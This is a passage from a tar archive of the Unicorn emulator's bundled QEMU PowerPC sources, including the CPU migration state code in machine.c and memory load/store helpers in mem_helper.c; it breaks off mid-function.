����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/machine.c�������������������������������������������������������������0000664�0000000�0000000�00000057675�14675241067�0020017�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#if 0 #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "helper_regs.h" #include "mmu-hash64.h" #include "kvm_ppc.h" #include "exec/helper-proto.h" static int cpu_load_old(QEMUFile *f, void *opaque, int version_id) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; unsigned int i, j; target_ulong sdr1; uint32_t fpscr, vscr; #if defined(TARGET_PPC64) int32_t slb_nr; #endif target_ulong xer; for (i = 0; i < 32; i++) { qemu_get_betls(f, &env->gpr[i]); } #if !defined(TARGET_PPC64) for (i = 0; i < 32; i++) { qemu_get_betls(f, &env->gprh[i]); } #endif qemu_get_betls(f, &env->lr); qemu_get_betls(f, &env->ctr); for (i = 0; i < 8; i++) { qemu_get_be32s(f, &env->crf[i]); } qemu_get_betls(f, &xer); cpu_write_xer(env, xer); qemu_get_betls(f, &env->reserve_addr); qemu_get_betls(f, &env->msr); for (i = 0; i < 4; i++) { qemu_get_betls(f, &env->tgpr[i]); } for (i = 0; i < 32; i++) { union { float64 d; uint64_t l; } u; u.l = qemu_get_be64(f); *cpu_fpr_ptr(env, i) = u.d; } qemu_get_be32s(f, &fpscr); env->fpscr = fpscr; qemu_get_sbe32s(f, &env->access_type); #if defined(TARGET_PPC64) qemu_get_betls(f, &env->spr[SPR_ASR]); qemu_get_sbe32s(f, &slb_nr); #endif qemu_get_betls(f, &sdr1); for (i = 0; i < 32; i++) { qemu_get_betls(f, &env->sr[i]); } for (i = 0; i < 2; i++) { for (j = 0; j < 8; j++) { qemu_get_betls(f, &env->DBAT[i][j]); } } for (i = 0; i < 2; i++) { for (j = 0; j < 8; j++) { qemu_get_betls(f, &env->IBAT[i][j]); } } qemu_get_sbe32s(f, &env->nb_tlb); qemu_get_sbe32s(f, &env->tlb_per_way); qemu_get_sbe32s(f, &env->nb_ways); qemu_get_sbe32s(f, &env->last_way); qemu_get_sbe32s(f, &env->id_tlbs); qemu_get_sbe32s(f, &env->nb_pids); if (env->tlb.tlb6) { /* XXX assumes 6xx */ for (i = 0; i < env->nb_tlb; i++) { qemu_get_betls(f, &env->tlb.tlb6[i].pte0); qemu_get_betls(f, &env->tlb.tlb6[i].pte1); qemu_get_betls(f, &env->tlb.tlb6[i].EPN); } } for (i = 0; i < 4; i++) { qemu_get_betls(f, &env->pb[i]); } for (i = 0; i < 1024; i++) { qemu_get_betls(f, &env->spr[i]); } if (!cpu->vhyp) { ppc_store_sdr1(env, sdr1); } qemu_get_be32s(f, &vscr); helper_mtvscr(env, vscr); qemu_get_be64s(f, &env->spe_acc); qemu_get_be32s(f, &env->spe_fscr); qemu_get_betls(f, &env->msr_mask); qemu_get_be32s(f, &env->flags); qemu_get_sbe32s(f, &env->error_code); qemu_get_be32s(f, &env->pending_interrupts); qemu_get_be32s(f, &env->irq_input_state); for (i = 0; i < POWERPC_EXCP_NB; i++) { qemu_get_betls(f, &env->excp_vectors[i]); } qemu_get_betls(f, &env->excp_prefix); qemu_get_betls(f, &env->ivor_mask); qemu_get_betls(f, &env->ivpr_mask); qemu_get_betls(f, &env->hreset_vector); qemu_get_betls(f, &env->nip); qemu_get_betls(f, &env->hflags); qemu_get_betls(f, &env->hflags_nmsr); qemu_get_sbe32(f); /* Discard unused mmu_idx */ qemu_get_sbe32(f); /* Discard unused power_mode */ /* Recompute mmu indices */ hreg_compute_mem_idx(env); return 0; } static int get_avr(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_avr_t *v = pv; v->u64[0] = qemu_get_be64(f); v->u64[1] = qemu_get_be64(f); return 0; } static int put_avr(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_avr_t *v = pv; qemu_put_be64(f, v->u64[0]); qemu_put_be64(f, v->u64[1]); return 0; } static const VMStateInfo vmstate_info_avr = { .name = "avr", .get = get_avr, .put = put_avr, }; #define VMSTATE_AVR_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_SUB_ARRAY(_f, _s, 32, _n, _v, vmstate_info_avr, ppc_avr_t) #define VMSTATE_AVR_ARRAY(_f, _s, _n) \ VMSTATE_AVR_ARRAY_V(_f, _s, _n, 0) static int get_fpr(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_vsr_t *v = pv; v->VsrD(0) = qemu_get_be64(f); return 0; } static int put_fpr(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_vsr_t *v = pv; qemu_put_be64(f, v->VsrD(0)); return 0; } static const VMStateInfo vmstate_info_fpr = { .name = "fpr", .get = get_fpr, .put = put_fpr, }; #define VMSTATE_FPR_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_SUB_ARRAY(_f, _s, 0, _n, _v, vmstate_info_fpr, ppc_vsr_t) #define VMSTATE_FPR_ARRAY(_f, _s, _n) \ VMSTATE_FPR_ARRAY_V(_f, _s, _n, 0) static int get_vsr(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_vsr_t *v = pv; v->VsrD(1) = qemu_get_be64(f); return 0; } static int put_vsr(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_vsr_t *v = pv; qemu_put_be64(f, v->VsrD(1)); return 0; } static const VMStateInfo vmstate_info_vsr = { .name = "vsr", .get = get_vsr, .put = put_vsr, }; #define VMSTATE_VSR_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_SUB_ARRAY(_f, _s, 0, _n, _v, vmstate_info_vsr, ppc_vsr_t) #define VMSTATE_VSR_ARRAY(_f, _s, _n) \ VMSTATE_VSR_ARRAY_V(_f, _s, _n, 0) static bool cpu_pre_2_8_migration(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; return cpu->pre_2_8_migration; } #if defined(TARGET_PPC64) static bool cpu_pre_3_0_migration(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; return cpu->pre_3_0_migration; } #endif static int cpu_pre_save(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int i; uint64_t insns_compat_mask = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD; uint64_t insns_compat_mask2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM; env->spr[SPR_LR] = env->lr; env->spr[SPR_CTR] = env->ctr; env->spr[SPR_XER] = cpu_read_xer(env); #if defined(TARGET_PPC64) env->spr[SPR_CFAR] = env->cfar; #endif env->spr[SPR_BOOKE_SPEFSCR] = env->spe_fscr; for (i = 0; (i < 4) && (i < env->nb_BATs); i++) { env->spr[SPR_DBAT0U + 2 * i] = env->DBAT[0][i]; env->spr[SPR_DBAT0U + 2 * i + 1] = env->DBAT[1][i]; env->spr[SPR_IBAT0U + 2 * i] = env->IBAT[0][i]; env->spr[SPR_IBAT0U + 2 * i + 1] = env->IBAT[1][i]; } for (i = 0; (i < 4) && ((i + 4) < env->nb_BATs); i++) { env->spr[SPR_DBAT4U + 2 * i] = env->DBAT[0][i + 4]; env->spr[SPR_DBAT4U + 2 * i + 1] = env->DBAT[1][i + 4]; env->spr[SPR_IBAT4U + 2 * i] = env->IBAT[0][i + 4]; env->spr[SPR_IBAT4U + 2 * i + 1] = env->IBAT[1][i + 4]; } /* Hacks for migration compatibility between 2.6, 2.7 & 2.8 */ if (cpu->pre_2_8_migration) { /* * Mask out bits that got added to msr_mask since the versions * which stupidly included it in the migration stream. */ target_ulong metamask = 0 #if defined(TARGET_PPC64) | (1ULL << MSR_TS0) | (1ULL << MSR_TS1) #endif ; cpu->mig_msr_mask = env->msr_mask & ~metamask; cpu->mig_insns_flags = env->insns_flags & insns_compat_mask; /* * CPU models supported by old machines all have * PPC_MEM_TLBIE, so we set it unconditionally to allow * backward migration from a POWER9 host to a POWER8 host. */ cpu->mig_insns_flags |= PPC_MEM_TLBIE; cpu->mig_insns_flags2 = env->insns_flags2 & insns_compat_mask2; cpu->mig_nb_BATs = env->nb_BATs; } if (cpu->pre_3_0_migration) { if (cpu->hash64_opts) { cpu->mig_slb_nr = cpu->hash64_opts->slb_size; } } return 0; } /* * Determine if a given PVR is a "close enough" match to the CPU * object. For TCG and KVM PR it would probably be sufficient to * require an exact PVR match. However for KVM HV the user is * restricted to a PVR exactly matching the host CPU. The correct way * to handle this is to put the guest into an architected * compatibility mode. However, to allow a more forgiving transition * and migration from before this was widely done, we allow migration * between sufficiently similar PVRs, as determined by the CPU class's * pvr_match() hook. */ static bool pvr_match(PowerPCCPU *cpu, uint32_t pvr) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); if (pvr == pcc->pvr) { return true; } return pcc->pvr_match(pcc, pvr); } static int cpu_post_load(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int i; target_ulong msr; /* * If we're operating in compat mode, we should be ok as long as * the destination supports the same compatiblity mode. * * Otherwise, however, we require that the destination has exactly * the same CPU model as the source. */ #if defined(TARGET_PPC64) if (cpu->compat_pvr) { uint32_t compat_pvr = cpu->compat_pvr; Error *local_err = NULL; cpu->compat_pvr = 0; ppc_set_compat(cpu, compat_pvr, &local_err); if (local_err) { error_report_err(local_err); return -1; } } else #endif { if (!pvr_match(cpu, env->spr[SPR_PVR])) { return -1; } } /* * If we're running with KVM HV, there is a chance that the guest * is running with KVM HV and its kernel does not have the * capability of dealing with a different PVR other than this * exact host PVR in KVM_SET_SREGS. If that happens, the * guest freezes after migration. * * The function kvmppc_pvr_workaround_required does this verification * by first checking if the kernel has the cap, returning true immediately * if that is the case. Otherwise, it checks if we're running in KVM PR. * If the guest kernel does not have the cap and we're not running KVM-PR * (so, it is running KVM-HV), we need to ensure that KVM_SET_SREGS will * receive the PVR it expects as a workaround. * */ if (kvmppc_pvr_workaround_required(cpu)) { env->spr[SPR_PVR] = env->spr_cb[SPR_PVR].default_value; } env->lr = env->spr[SPR_LR]; env->ctr = env->spr[SPR_CTR]; cpu_write_xer(env, env->spr[SPR_XER]); #if defined(TARGET_PPC64) env->cfar = env->spr[SPR_CFAR]; #endif env->spe_fscr = env->spr[SPR_BOOKE_SPEFSCR]; for (i = 0; (i < 4) && (i < env->nb_BATs); i++) { env->DBAT[0][i] = env->spr[SPR_DBAT0U + 2 * i]; env->DBAT[1][i] = env->spr[SPR_DBAT0U + 2 * i + 1]; env->IBAT[0][i] = env->spr[SPR_IBAT0U + 2 * i]; env->IBAT[1][i] = env->spr[SPR_IBAT0U + 2 * i + 1]; } for (i = 0; (i < 4) && ((i + 4) < env->nb_BATs); i++) { env->DBAT[0][i + 4] = env->spr[SPR_DBAT4U + 2 * i]; env->DBAT[1][i + 4] = env->spr[SPR_DBAT4U + 2 * i + 1]; env->IBAT[0][i + 4] = env->spr[SPR_IBAT4U + 2 * i]; env->IBAT[1][i + 4] = env->spr[SPR_IBAT4U + 2 * i + 1]; } if (!cpu->vhyp) { ppc_store_sdr1(env, env->spr[SPR_SDR1]); } /* * Invalidate all supported msr bits except MSR_TGPR/MSR_HVB * before restoring */ msr = env->msr; env->msr ^= env->msr_mask & ~((1ULL << MSR_TGPR) | MSR_HVB); ppc_store_msr(env, msr); hreg_compute_mem_idx(env); return 0; } static bool fpu_needed(void *opaque) { PowerPCCPU *cpu = opaque; return cpu->env.insns_flags & PPC_FLOAT; } static const VMStateDescription vmstate_fpu = { .name = "cpu/fpu", .version_id = 1, .minimum_version_id = 1, .needed = fpu_needed, .fields = (VMStateField[]) { VMSTATE_FPR_ARRAY(env.vsr, PowerPCCPU, 32), VMSTATE_UINTTL(env.fpscr, PowerPCCPU), VMSTATE_END_OF_LIST() }, }; static bool altivec_needed(void *opaque) { PowerPCCPU *cpu = opaque; return cpu->env.insns_flags & PPC_ALTIVEC; } static int get_vscr(QEMUFile *f, void *opaque, size_t size, const VMStateField *field) { PowerPCCPU *cpu = opaque; helper_mtvscr(&cpu->env, qemu_get_be32(f)); return 0; } static int put_vscr(QEMUFile *f, void *opaque, size_t size, const VMStateField *field, QJSON *vmdesc) { PowerPCCPU *cpu = opaque; qemu_put_be32(f, helper_mfvscr(&cpu->env)); return 0; } static const VMStateInfo vmstate_vscr = { .name = "cpu/altivec/vscr", .get = get_vscr, .put = put_vscr, }; static const VMStateDescription vmstate_altivec = { .name = "cpu/altivec", .version_id = 1, .minimum_version_id = 1, .needed = altivec_needed, .fields = (VMStateField[]) { VMSTATE_AVR_ARRAY(env.vsr, PowerPCCPU, 32), /* * Save the architecture value of the vscr, not the internally * expanded version. Since this architecture value does not * exist in memory to be stored, this requires a but of hoop * jumping. We want OFFSET=0 so that we effectively pass CPU * to the helper functions. */ { .name = "vscr", .version_id = 0, .size = sizeof(uint32_t), .info = &vmstate_vscr, .flags = VMS_SINGLE, .offset = 0 }, VMSTATE_END_OF_LIST() }, }; static bool vsx_needed(void *opaque) { PowerPCCPU *cpu = opaque; return cpu->env.insns_flags2 & PPC2_VSX; } static const VMStateDescription vmstate_vsx = { .name = "cpu/vsx", .version_id = 1, .minimum_version_id = 1, .needed = vsx_needed, .fields = (VMStateField[]) { VMSTATE_VSR_ARRAY(env.vsr, PowerPCCPU, 32), VMSTATE_END_OF_LIST() }, }; #ifdef TARGET_PPC64 /* Transactional memory state */ static bool tm_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return msr_ts; } static const VMStateDescription vmstate_tm = { .name = "cpu/tm", .version_id = 1, .minimum_version_id = 1, .minimum_version_id_old = 1, .needed = tm_needed, .fields = (VMStateField []) { VMSTATE_UINTTL_ARRAY(env.tm_gpr, PowerPCCPU, 32), VMSTATE_AVR_ARRAY(env.tm_vsr, PowerPCCPU, 64), VMSTATE_UINT64(env.tm_cr, PowerPCCPU), VMSTATE_UINT64(env.tm_lr, PowerPCCPU), VMSTATE_UINT64(env.tm_ctr, PowerPCCPU), VMSTATE_UINT64(env.tm_fpscr, PowerPCCPU), VMSTATE_UINT64(env.tm_amr, PowerPCCPU), VMSTATE_UINT64(env.tm_ppr, PowerPCCPU), VMSTATE_UINT64(env.tm_vrsave, PowerPCCPU), VMSTATE_UINT32(env.tm_vscr, PowerPCCPU), VMSTATE_UINT64(env.tm_dscr, PowerPCCPU), VMSTATE_UINT64(env.tm_tar, PowerPCCPU), VMSTATE_END_OF_LIST() }, }; #endif static bool sr_needed(void *opaque) { #ifdef TARGET_PPC64 PowerPCCPU *cpu = opaque; return !(cpu->env.mmu_model & POWERPC_MMU_64); #else return true; #endif } static const VMStateDescription vmstate_sr = { .name = "cpu/sr", .version_id = 1, .minimum_version_id = 1, .needed = sr_needed, .fields = (VMStateField[]) { VMSTATE_UINTTL_ARRAY(env.sr, PowerPCCPU, 32), VMSTATE_END_OF_LIST() }, }; #ifdef TARGET_PPC64 static int get_slbe(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_slb_t *v = pv; v->esid = qemu_get_be64(f); v->vsid = qemu_get_be64(f); return 0; } static int put_slbe(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_slb_t *v = pv; qemu_put_be64(f, v->esid); qemu_put_be64(f, v->vsid); return 0; } static const VMStateInfo vmstate_info_slbe = { .name = "slbe", .get = get_slbe, .put = put_slbe, }; #define VMSTATE_SLB_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_ARRAY(_f, _s, _n, _v, vmstate_info_slbe, ppc_slb_t) #define VMSTATE_SLB_ARRAY(_f, _s, _n) \ VMSTATE_SLB_ARRAY_V(_f, _s, _n, 0) static bool slb_needed(void *opaque) { PowerPCCPU *cpu = opaque; /* We don't support any of the old segment table based 64-bit CPUs */ return cpu->env.mmu_model & POWERPC_MMU_64; } static int slb_post_load(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int i; /* * We've pulled in the raw esid and vsid values from the migration * stream, but we need to recompute the page size pointers */ for (i = 0; i < cpu->hash64_opts->slb_size; i++) { if (ppc_store_slb(cpu, i, env->slb[i].esid, env->slb[i].vsid) < 0) { /* Migration source had bad values in its SLB */ return -1; } } return 0; } static const VMStateDescription vmstate_slb = { .name = "cpu/slb", .version_id = 1, .minimum_version_id = 1, .needed = slb_needed, .post_load = slb_post_load, .fields = (VMStateField[]) { VMSTATE_INT32_TEST(mig_slb_nr, PowerPCCPU, cpu_pre_3_0_migration), VMSTATE_SLB_ARRAY(env.slb, PowerPCCPU, MAX_SLB_ENTRIES), VMSTATE_END_OF_LIST() } }; #endif /* TARGET_PPC64 */ static const VMStateDescription vmstate_tlb6xx_entry = { .name = "cpu/tlb6xx_entry", .version_id = 1, .minimum_version_id = 1, .fields = (VMStateField[]) { VMSTATE_UINTTL(pte0, ppc6xx_tlb_t), VMSTATE_UINTTL(pte1, ppc6xx_tlb_t), VMSTATE_UINTTL(EPN, ppc6xx_tlb_t), VMSTATE_END_OF_LIST() }, }; static bool tlb6xx_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return env->nb_tlb && (env->tlb_type == TLB_6XX); } static const VMStateDescription vmstate_tlb6xx = { .name = "cpu/tlb6xx", .version_id = 1, .minimum_version_id = 1, .needed = tlb6xx_needed, .fields = (VMStateField[]) { VMSTATE_INT32_EQUAL(env.nb_tlb, PowerPCCPU, NULL), VMSTATE_STRUCT_VARRAY_POINTER_INT32(env.tlb.tlb6, PowerPCCPU, env.nb_tlb, vmstate_tlb6xx_entry, ppc6xx_tlb_t), VMSTATE_UINTTL_ARRAY(env.tgpr, PowerPCCPU, 4), VMSTATE_END_OF_LIST() } }; static const VMStateDescription vmstate_tlbemb_entry = { .name = "cpu/tlbemb_entry", .version_id = 1, .minimum_version_id = 1, .fields = (VMStateField[]) { VMSTATE_UINT64(RPN, ppcemb_tlb_t), VMSTATE_UINTTL(EPN, ppcemb_tlb_t), VMSTATE_UINTTL(PID, ppcemb_tlb_t), VMSTATE_UINTTL(size, ppcemb_tlb_t), VMSTATE_UINT32(prot, ppcemb_tlb_t), VMSTATE_UINT32(attr, ppcemb_tlb_t), VMSTATE_END_OF_LIST() }, }; static bool tlbemb_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return env->nb_tlb && (env->tlb_type == TLB_EMB); } static bool pbr403_needed(void *opaque) { PowerPCCPU *cpu = opaque; uint32_t pvr = cpu->env.spr[SPR_PVR]; return (pvr & 0xffff0000) == 0x00200000; } static const VMStateDescription vmstate_pbr403 = { .name = "cpu/pbr403", .version_id = 1, .minimum_version_id = 1, .needed = pbr403_needed, .fields = (VMStateField[]) { VMSTATE_UINTTL_ARRAY(env.pb, PowerPCCPU, 4), VMSTATE_END_OF_LIST() }, }; static const VMStateDescription vmstate_tlbemb = { .name = "cpu/tlb6xx", .version_id = 1, .minimum_version_id = 1, .needed = tlbemb_needed, .fields = (VMStateField[]) { VMSTATE_INT32_EQUAL(env.nb_tlb, PowerPCCPU, NULL), VMSTATE_STRUCT_VARRAY_POINTER_INT32(env.tlb.tlbe, PowerPCCPU, env.nb_tlb, vmstate_tlbemb_entry, ppcemb_tlb_t), /* 403 protection registers */ VMSTATE_END_OF_LIST() }, .subsections = (const VMStateDescription*[]) { &vmstate_pbr403, NULL } }; static const VMStateDescription vmstate_tlbmas_entry = { .name = "cpu/tlbmas_entry", .version_id = 1, .minimum_version_id = 1, .fields = (VMStateField[]) { VMSTATE_UINT32(mas8, ppcmas_tlb_t), VMSTATE_UINT32(mas1, ppcmas_tlb_t), VMSTATE_UINT64(mas2, ppcmas_tlb_t), VMSTATE_UINT64(mas7_3, ppcmas_tlb_t), VMSTATE_END_OF_LIST() }, }; static bool tlbmas_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return env->nb_tlb && (env->tlb_type == TLB_MAS); } static const VMStateDescription vmstate_tlbmas = { .name = "cpu/tlbmas", .version_id = 1, .minimum_version_id = 1, .needed = tlbmas_needed, .fields = (VMStateField[]) { VMSTATE_INT32_EQUAL(env.nb_tlb, PowerPCCPU, NULL), VMSTATE_STRUCT_VARRAY_POINTER_INT32(env.tlb.tlbm, PowerPCCPU, env.nb_tlb, vmstate_tlbmas_entry, ppcmas_tlb_t), VMSTATE_END_OF_LIST() } }; static bool compat_needed(void *opaque) { PowerPCCPU *cpu = opaque; assert(!(cpu->compat_pvr && !cpu->vhyp)); return !cpu->pre_2_10_migration && cpu->compat_pvr != 0; } static const VMStateDescription vmstate_compat = { .name = "cpu/compat", .version_id = 1, .minimum_version_id = 1, .needed = compat_needed, .fields = (VMStateField[]) { VMSTATE_UINT32(compat_pvr, PowerPCCPU), VMSTATE_END_OF_LIST() } }; const VMStateDescription vmstate_ppc_cpu = { .name = "cpu", .version_id = 5, .minimum_version_id = 5, .minimum_version_id_old = 4, .load_state_old = cpu_load_old, .pre_save = cpu_pre_save, .post_load = cpu_post_load, .fields = (VMStateField[]) { VMSTATE_UNUSED(sizeof(target_ulong)), /* was _EQUAL(env.spr[SPR_PVR]) */ /* User mode architected state */ VMSTATE_UINTTL_ARRAY(env.gpr, PowerPCCPU, 32), #if !defined(TARGET_PPC64) VMSTATE_UINTTL_ARRAY(env.gprh, PowerPCCPU, 32), #endif VMSTATE_UINT32_ARRAY(env.crf, PowerPCCPU, 8), VMSTATE_UINTTL(env.nip, PowerPCCPU), /* SPRs */ VMSTATE_UINTTL_ARRAY(env.spr, PowerPCCPU, 1024), VMSTATE_UINT64(env.spe_acc, PowerPCCPU), /* Reservation */ VMSTATE_UINTTL(env.reserve_addr, PowerPCCPU), /* Supervisor mode architected state */ VMSTATE_UINTTL(env.msr, PowerPCCPU), /* Internal state */ VMSTATE_UINTTL(env.hflags_nmsr, PowerPCCPU), /* FIXME: access_type? */ /* Sanity checking */ VMSTATE_UINTTL_TEST(mig_msr_mask, PowerPCCPU, cpu_pre_2_8_migration), VMSTATE_UINT64_TEST(mig_insns_flags, PowerPCCPU, cpu_pre_2_8_migration), VMSTATE_UINT64_TEST(mig_insns_flags2, PowerPCCPU, cpu_pre_2_8_migration), VMSTATE_UINT32_TEST(mig_nb_BATs, PowerPCCPU, cpu_pre_2_8_migration), VMSTATE_END_OF_LIST() }, .subsections = (const VMStateDescription*[]) { &vmstate_fpu, &vmstate_altivec, &vmstate_vsx, &vmstate_sr, #ifdef TARGET_PPC64 &vmstate_tm, &vmstate_slb, #endif /* TARGET_PPC64 */ &vmstate_tlb6xx, &vmstate_tlbemb, &vmstate_tlbmas, &vmstate_compat, NULL } }; #endif �������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mem_helper.c����������������������������������������������������������0000664�0000000�0000000�00000052745�14675241067�0020521�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC memory access emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "helper_regs.h" #include "exec/cpu_ldst.h" #include "tcg/tcg.h" #include "internal.h" #include "qemu/atomic128.h" /* #define DEBUG_OP */ static inline bool needs_byteswap(const CPUPPCState *env) { #if defined(TARGET_WORDS_BIGENDIAN) return msr_le; #else return !msr_le; #endif } /*****************************************************************************/ /* Memory load and stores */ static inline target_ulong addr_add(CPUPPCState *env, target_ulong addr, target_long arg) { #if defined(TARGET_PPC64) if (!msr_is_64bit(env, env->msr)) { return (uint32_t)(addr + arg); } else #endif { return addr + arg; } } static void *probe_contiguous(CPUPPCState *env, target_ulong addr, uint32_t nb, MMUAccessType access_type, int mmu_idx, uintptr_t raddr) { char *host1, *host2; uint32_t nb_pg1, nb_pg2; #ifdef _MSC_VER nb_pg1 = 0 - (addr | TARGET_PAGE_MASK); #else nb_pg1 = -(addr | TARGET_PAGE_MASK); #endif if (likely(nb <= nb_pg1)) { /* The entire operation is on a single page. */ return probe_access(env, addr, nb, access_type, mmu_idx, raddr); } /* The operation spans two pages. */ nb_pg2 = nb - nb_pg1; host1 = probe_access(env, addr, nb_pg1, access_type, mmu_idx, raddr); addr = addr_add(env, addr, nb_pg1); host2 = probe_access(env, addr, nb_pg2, access_type, mmu_idx, raddr); /* If the two host pages are contiguous, optimize. */ if (host2 == host1 + nb_pg1) { return host1; } return NULL; } void helper_lmw(CPUPPCState *env, target_ulong addr, uint32_t reg) { uintptr_t raddr = GETPC(); int mmu_idx = cpu_mmu_index(env, false); char *host = probe_contiguous(env, addr, (32 - reg) * 4, MMU_DATA_LOAD, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; reg < 32; reg++) { env->gpr[reg] = (uint32_t)ldl_be_p(host); host += 4; } } else { /* Slow path -- at least some of the operation requires i/o. */ for (; reg < 32; reg++) { env->gpr[reg] = cpu_ldl_mmuidx_ra(env, addr, mmu_idx, raddr); addr = addr_add(env, addr, 4); } } } void helper_stmw(CPUPPCState *env, target_ulong addr, uint32_t reg) { uintptr_t raddr = GETPC(); int mmu_idx = cpu_mmu_index(env, false); char *host = probe_contiguous(env, addr, (32 - reg) * 4, MMU_DATA_STORE, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; reg < 32; reg++) { stl_be_p(host, env->gpr[reg]); host += 4; } } else { /* Slow path -- at least some of the operation requires i/o. */ for (; reg < 32; reg++) { cpu_stl_mmuidx_ra(env, addr, env->gpr[reg], mmu_idx, raddr); addr = addr_add(env, addr, 4); } } } static void do_lsw(CPUPPCState *env, target_ulong addr, uint32_t nb, uint32_t reg, uintptr_t raddr) { int mmu_idx; char *host; uint32_t val; if (unlikely(nb == 0)) { return; } mmu_idx = cpu_mmu_index(env, false); host = probe_contiguous(env, addr, nb, MMU_DATA_LOAD, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; nb > 3; nb -= 4) { env->gpr[reg] = (uint32_t)ldl_be_p(host); reg = (reg + 1) % 32; host += 4; } switch (nb) { default: return; case 1: val = ldub_p(host) << 24; break; case 2: val = lduw_be_p(host) << 16; break; case 3: val = (lduw_be_p(host) << 16) | (ldub_p(host + 2) << 8); break; } } else { /* Slow path -- at least some of the operation requires i/o. */ for (; nb > 3; nb -= 4) { env->gpr[reg] = cpu_ldl_mmuidx_ra(env, addr, mmu_idx, raddr); reg = (reg + 1) % 32; addr = addr_add(env, addr, 4); } switch (nb) { default: return; case 1: val = cpu_ldub_mmuidx_ra(env, addr, mmu_idx, raddr) << 24; break; case 2: val = cpu_lduw_mmuidx_ra(env, addr, mmu_idx, raddr) << 16; break; case 3: val = cpu_lduw_mmuidx_ra(env, addr, mmu_idx, raddr) << 16; addr = addr_add(env, addr, 2); val |= cpu_ldub_mmuidx_ra(env, addr, mmu_idx, raddr) << 8; break; } } env->gpr[reg] = val; } void helper_lsw(CPUPPCState *env, target_ulong addr, uint32_t nb, uint32_t reg) { do_lsw(env, addr, nb, reg, GETPC()); } /* * PPC32 specification says we must generate an exception if rA is in * the range of registers to be loaded. In an other hand, IBM says * this is valid, but rA won't be loaded. For now, I'll follow the * spec... */ void helper_lswx(CPUPPCState *env, target_ulong addr, uint32_t reg, uint32_t ra, uint32_t rb) { if (likely(xer_bc != 0)) { int num_used_regs = DIV_ROUND_UP(xer_bc, 4); if (unlikely((ra != 0 && lsw_reg_in_range(reg, num_used_regs, ra)) || lsw_reg_in_range(reg, num_used_regs, rb))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_LSWX, GETPC()); } else { do_lsw(env, addr, xer_bc, reg, GETPC()); } } } void helper_stsw(CPUPPCState *env, target_ulong addr, uint32_t nb, uint32_t reg) { uintptr_t raddr = GETPC(); int mmu_idx; char *host; uint32_t val; if (unlikely(nb == 0)) { return; } mmu_idx = cpu_mmu_index(env, false); host = probe_contiguous(env, addr, nb, MMU_DATA_STORE, mmu_idx, raddr); if 